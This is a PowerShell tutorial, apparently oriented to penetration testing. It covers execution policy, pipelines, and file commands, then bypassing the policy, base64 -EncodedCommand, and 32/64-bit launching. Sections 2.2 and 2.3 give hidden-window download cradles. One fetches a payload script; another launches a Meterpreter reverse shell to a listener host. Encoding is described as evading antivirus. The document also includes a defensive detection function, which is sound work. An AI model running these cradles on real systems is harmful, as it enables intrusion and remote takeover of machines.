PowerShell is the command-line shell and scripting language of Windows. Wherever code can run on a machine, a PowerShell script can be executed, even without ever being written to disk. PowerShell has the following properties that matter here:
- Scripts can run entirely in memory; nothing has to be written to disk.
- Commands can be executed remotely.
- It can be used to administer Active Directory.
The following commands start PowerShell and show its version:
powershell
Get-Host
$PSVersionTable.PSVersion
Get-Host reports the version of the host application; $PSVersionTable.PSVersion is the version of the engine itself and is the one to rely on.
1. Basic concepts
1.1 .ps1 files
.ps1 is the file extension of a PowerShell script. Such a file contains a series of PowerShell commands, one per line.
1.2 Execution policy
To keep users from running malicious scripts by accident, PowerShell's execution policy is set by default so that script files do not run at all (Restricted on Windows client editions; Windows Server defaults to RemoteSigned). Run the following cmdlet to query the current policy:
Get-ExecutionPolicy
The execution policy has the following settings:
- Restricted: no script files run (the default on Windows clients).
- RemoteSigned: scripts created locally run; scripts downloaded from the Internet run only if signed by a trusted publisher. "Downloaded" means the file carries the Zone.Identifier alternate data stream (the mark of the web); Unblock-File removes it.
- AllSigned: a script runs only if it is signed by a trusted publisher, whatever its origin.
- Unrestricted: all scripts run (downloaded ones after a prompt).
The policy is a safety net against accidental execution, not a security boundary: it applies only to script files, and the commands inside a file can always be run another way, as section 2.2 shows.
The policy is set with the following command (add -Scope CurrentUser or -Scope Process to change it for the current user or only for the current process instead of the whole machine, which needs administrator rights):
Set-ExecutionPolicy <policy-name>
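Added example, not from the original page: how the policy resolves across scopes, and why it is a safety feature rather than a security boundary. The test script is created in %TEMP% for the example; nothing else is assumed.

```powershell
# Scopes are listed in precedence order: MachinePolicy and UserPolicy (Group Policy)
# win over Process, which wins over CurrentUser, which wins over LocalMachine.
Get-ExecutionPolicy -List

# Process scope changes only this PowerShell process, needs no admin rights and
# persists nothing. Start from the strictest setting to see what it blocks.
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Restricted -Force

# A test script, created here for the example
$script = Join-Path $env:TEMP 'hello.ps1'
Set-Content -Path $script -Value 'Write-Output "script file ran in PID $PID"'

# Restricted refuses to load the file: "running scripts is disabled on this system"
try   { & $script }
catch { "Blocked as a file: $($_.Exception.GetType().Name)" }

# The same text, read and evaluated as a string, runs anyway. The policy governs
# script files, not code; this is why it is not a security boundary.
Get-Content -Path $script -Raw | Invoke-Expression

# Relax the policy for this process only and the file runs directly
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force
& $script
Get-ExecutionPolicy    # effective policy for this process: Bypass
```

If a Group Policy sets MachinePolicy or UserPolicy, Set-ExecutionPolicy still records the Process-scope value but warns that it is overridden; the Get-Content | Invoke-Expression line works regardless.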
1.3 Pipeline
A pipeline passes the output of one command to the next command as input; the two commands are joined with the "|" character. In the following example every running process whose name starts with "p" is stopped, without any confirmation prompt:
get-process p* | stop-process
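As an added example (not from the original post), a longer pipeline that filters before it acts. It lists processes whose executable lives outside the Windows and Program Files directories, a routine triage question, and then shows the same kind of filter feeding Stop-Process with -WhatIf so nothing is actually killed. The directory roots come from the environment; the $env:TEMP filter at the end is only an illustration.

```powershell
# Roots under which binaries are expected; ProgramFiles(x86) is absent on 32-bit Windows
$trustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

Get-Process |
    Where-Object { $_.Path } |                  # Path is empty for processes this user cannot inspect
    Where-Object {
        $path = $_.Path
        # keep the process only if no trusted root is a prefix of its path
        -not ($trustedRoots | Where-Object { $path -like "$_\*" })
    } |
    Select-Object Id, ProcessName, Path |
    Sort-Object ProcessName |
    Format-Table -AutoSize

# The same pattern feeding Stop-Process. -WhatIf only reports what would be stopped;
# the one-liner above ("get-process p* | stop-process") has no such safety net.
Get-Process |
    Where-Object { $_.Path -and $_.Path -like "$env:TEMP\*" } |
    Stop-Process -WhatIf
```

Where-Object runs its script block once per object, so filtering early keeps the expensive or destructive cmdlet at the end of the pipeline from seeing anything it should not touch.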
2. Common commands
2.1 File commands
The basic commands largely mirror the Linux shell (ls, cat, rm, mkdir and others exist as aliases). Commonly used file commands:
New-Item vuln -ItemType Directory           create a directory
New-Item 1.txt -ItemType File               create a file
Remove-Item .\while\                        delete a directory (prompts when it is not empty; add -Recurse to delete it with its contents)
Get-Content .\1.txt                         show the contents of a text file
Set-Content .\1.txt -Value "hello world!"   replace the contents of the file
Add-Content .\1.txt -Value "i love you"     append to the file, on a new line
Clear-Content .\1.txt                       empty the file without deleting it
2.2 Bypassing the local execution policy and running scripts
- Upload 1.ps1 to the target. From a command prompt, run the following to ignore the execution policy and execute the script file locally:
powershell.exe -ExecutionPolicy Bypass -File 1.ps1
- Upload the same script, import it as a module and call one of its functions. Here 1.ps1 is assumed to export Invoke-AllChecks, the entry point of PowerSploit's PowerUp:
powershell.exe -Exec Bypass -Command "& {Import-Module .\1.ps1; Invoke-AllChecks}"
- Download the script from a server, bypass the local policy and run it in memory with the window hidden. The URL is single-quoted inside the double-quoted -Command string because the outer double quotes are consumed when the command line is parsed:
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -NonI -Command "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/Payload.ps1'); [payload parameters]"
- The script https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1 (the double hyphen is part of that fork's file name, not a typo) starts a Meterpreter session on the target:
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -NonI -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 80 -Force"
The -Payload/-Lhost/-Lport form belongs to that older fork; later versions of PowerSploit's Invoke-Shellcode dropped the built-in Metasploit payloads and take raw shellcode bytes through -Shellcode instead.
The commonly used parameters are:
- -ExecutionPolicy Bypass (-Exec Bypass): ignore the execution policy for this process only.
- -WindowStyle Hidden (-W Hidden): hide the console window.
- -NonInteractive (-NonI): non-interactive mode; PowerShell shows no interactive prompts and fails instead of waiting for input.
- -NoProfile (-NoP): do not load the current user's profile scripts.
- -NoExit: keep the shell open after the command has run.
- -NoLogo: start without the copyright banner.
powershell.exe accepts any unambiguous prefix of a parameter name, which is why the short forms (-nop, -noni, -w, -exec, -enc) work. This combination of flags in a process command line is also one of the most widely monitored indicators, so expect it to be logged.
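The same flags seen from the defender's side, as an added example that is not from the original page. Given command lines as they appear in process-creation logs (Sysmon event 1 or Security event 4688 with command-line auditing enabled), the function scores the flags listed above, spots download cradles, and decodes -EncodedCommand so the real command can be inspected. The three sample command lines are constructed for the example; the function and its name are this example's own.

```powershell
function Test-SuspiciousPowerShell {
    param([Parameter(Mandatory)][string]$CommandLine)

    $reasons = New-Object System.Collections.Generic.List[string]
    # powershell.exe accepts any unambiguous prefix of a parameter name,
    # so the patterns match the short forms (-nop, -w, -noni, -exec) as well
    $checks = [ordered]@{
        'ExecutionPolicy Bypass/Unrestricted' = '(?i)-(ex\w*|ep)\s+(bypass|unrestricted)'
        'Hidden window'                        = '(?i)-w\w*\s+hidden'
        'No profile'                           = '(?i)-nop\w*'
        'Non-interactive'                      = '(?i)-noni\w*'
        'Download cradle'                      = '(?i)(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Invoke-Expression|\bIEX\b)'
    }
    foreach ($name in $checks.Keys) {
        if ($CommandLine -match $checks[$name]) { $reasons.Add($name) }
    }

    # -EncodedCommand hides the real command: base64 of its UTF-16LE bytes.
    # Decode it and run the cradle check on the plain text as well.
    $decoded = $null
    if ($CommandLine -match '(?i)-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})') {
        $reasons.Add('Encoded command')
        try {
            $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2]))
            if ($decoded -match $checks['Download cradle']) { $reasons.Add('Download cradle (inside -enc)') }
        } catch {
            $reasons.Add('Encoded command (not valid base64)')
        }
    }

    [PSCustomObject]@{
        Score       = $reasons.Count
        Reasons     = ($reasons -join ', ')
        Decoded     = $decoded
        CommandLine = $CommandLine
    }
}

# Constructed sample command lines, as they would appear in the CommandLine field.
# The encoded one is built here so the base64 is exact.
$encodedPart = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/Payload.ps1')"))
$samples = @(
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command ""IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/Payload.ps1')""",
    "powershell.exe -nop -w hidden -enc $encodedPart",
    'powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1'
)

$samples | ForEach-Object { Test-SuspiciousPowerShell -CommandLine $_ } |
    Sort-Object Score -Descending |
    Format-List Score, Reasons, Decoded
```

The first sample scores on all five checks, the encoded one on hidden window, no profile, the encoded command and the cradle found inside it, and the scheduled backup on none. In practice the score is combined with the parent process (Office applications, wscript.exe, or a service spawning powershell.exe) before anyone is paged.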
2.3 Base64-encoding PowerShell commands
Encoding the command serves two purposes: it sidesteps quoting and special-character problems when the command is passed on a command line, and it hides the plain-text command from simple string matching by antivirus engines and log filters. It does not compress anything: -EncodedCommand expects the base64 of the UTF-16LE bytes of the command, so the result is about 2.7 times longer than the original. The following Python script produces that encoding from a script file:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Encode a PowerShell script file for powershell.exe -EncodedCommand.
# -EncodedCommand expects base64 of the UTF-16LE bytes of the command text.
import base64
import getopt
import os
import sys

__version__ = "1.0"


def powershell_encode(data):
    # Drop a UTF-8 byte-order mark that editors such as the ISE prepend;
    # left in, it becomes a stray character at the start of the command
    data = data.lstrip(u"\ufeff")
    # UTF-16LE is what -EncodedCommand expects. Encoding properly (rather than
    # inserting a null byte after every character) also handles non-ASCII text.
    powershell_command = base64.b64encode(data.encode("utf-16le"))
    return powershell_command.decode("ascii")


def usage():
    print("Version: {0}".format(__version__))
    print("Usage: {0} <options>\n".format(sys.argv[0]))
    print("Options:")
    print("  -h, --help             Show this help message and exit")
    print("  -s, --script <script>  PowerShell script.")
    sys.exit(0)


def main():
    try:
        options, args = getopt.getopt(sys.argv[1:], "hs:", ["help", "script="])
    except getopt.GetoptError:
        print("Wrong option provided!")
        usage()
    if len(sys.argv) == 1:
        usage()
    for opt, arg in options:
        if opt in ("-h", "--help"):
            usage()
        elif opt in ("-s", "--script"):
            script_file = arg
            if not os.path.isfile(script_file):
                print("The specified PowerShell script does not exist")
                sys.exit(1)
            # utf-8-sig strips a BOM while reading; line endings are kept as they are
            with open(script_file, "r", encoding="utf-8-sig") as handle:
                ps_script = handle.read()
            print(powershell_encode(ps_script))


if __name__ == "__main__":
    main()
First write the PowerShell command into a file (on the attacking host, e.g. in bash; note that in Windows PowerShell 5.1 the ">" operator writes UTF-16LE, which the script above does not expect):
echo "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 80 -Force" > raw.txt
Encode it with the script (-s raw.txt), then run the output on the target host:
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc <base64 string produced by the script>
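The same encoding done natively in PowerShell, as an added example that is not from the original page; the function names are this example's own. It makes explicit what -EncodedCommand expects (base64 of the UTF-16LE bytes), verifies the round trip, and shows the size cost. The launch at the end uses a harmless command instead of the cradle so the block can be run as-is.

```powershell
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    # "Unicode" in .NET is UTF-16LE, exactly what powershell.exe -EncodedCommand decodes
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

# The command from raw.txt above, embedded here so the example runs offline.
# For a file use:  $command = (Get-Content -Path .\raw.txt -Raw).TrimEnd()
# Get-Content strips a UTF-8 or UTF-16 BOM itself, so no BOM handling is needed.
$command = "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 80 -Force"

$encoded = ConvertTo-EncodedCommand -Command $command
if ((ConvertFrom-EncodedCommand -Base64 $encoded) -ne $command) { throw 'round trip failed' }

# Two bytes per character, then 4 base64 characters per 3 bytes: about 8/3 growth.
# CreateProcess limits a command line to 32767 characters (cmd.exe to 8191), so a
# script much beyond roughly 12000 characters will not fit in -EncodedCommand and
# has to be fetched over the network or written to disk instead.
"{0} chars of script -> {1} chars of base64" -f $command.Length, $encoded.Length

# Launch with a harmless payload so this block is safe to run; the child process
# decodes the base64 and runs the text, no quoting problems on the way.
$demo = ConvertTo-EncodedCommand -Command 'Write-Output "encoded command ran in PID $PID"'
powershell.exe -NoP -NonI -Exec Bypass -EncodedCommand $demo
```

The single-quoted string keeps $PID unexpanded in the parent, so the child prints its own process ID, which is a quick way to confirm that the encoded text really executed in the new process.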
2.4 Running 32-bit and 64-bit PowerShell
On 64-bit Windows there are two copies of powershell.exe, and which one runs matters: injection and reflective-loading tools need a PowerShell whose architecture matches the target process and the shellcode. The original text had the two paths the wrong way round; the correct mapping is:
%windir%\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass    64-bit PowerShell (what plain "powershell.exe" resolves to from a 64-bit process)
%windir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass    32-bit PowerShell
From a 32-bit process (a 32-bit cmd.exe or a 32-bit implant) the System32 path is silently redirected to SysWOW64; use %windir%\sysnative\WindowsPowerShell\v1.0\powershell.exe to reach the 64-bit binary from there.
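Added example, not from the original page: determine which architecture the current PowerShell is, then start the other one, using the sysnative alias when starting from a 32-bit process. The function names are this example's own.

```powershell
function Get-PowerShellArch {
    # Is64BitProcess is the authoritative answer; the path shows which binary is running
    [PSCustomObject]@{
        Pid         = $PID
        Is64BitOS   = [Environment]::Is64BitOperatingSystem
        Is64BitProc = [Environment]::Is64BitProcess
        Path        = (Get-Process -Id $PID).Path
    }
}

function Get-OtherArchPowerShell {
    # Returns the path of the powershell.exe with the opposite architecture
    if (-not [Environment]::Is64BitOperatingSystem) {
        throw '32-bit Windows only has a 32-bit PowerShell'
    }
    if ([Environment]::Is64BitProcess) {
        # 64-bit caller: the 32-bit copy lives in SysWOW64
        "$env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    } else {
        # 32-bit caller: System32 would be redirected to SysWOW64, so go through sysnative
        "$env:SystemRoot\sysnative\WindowsPowerShell\v1.0\powershell.exe"
    }
}

Get-PowerShellArch
$other = Get-OtherArchPowerShell
"Starting $other"
# The child prints $true or $false for its own architecture, so the switch is verifiable
& $other -NoP -NonI -Exec Bypass -Command '[Environment]::Is64BitProcess'
```

Run the block once from a normal (64-bit) console and once from the SysWOW64 copy; the child's answer flips each time, and the sysnative path only resolves in the second case, since the alias exists for 32-bit processes only.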
An online PowerShell tutorial: https://www.pstips.net/powershell-online-tutorials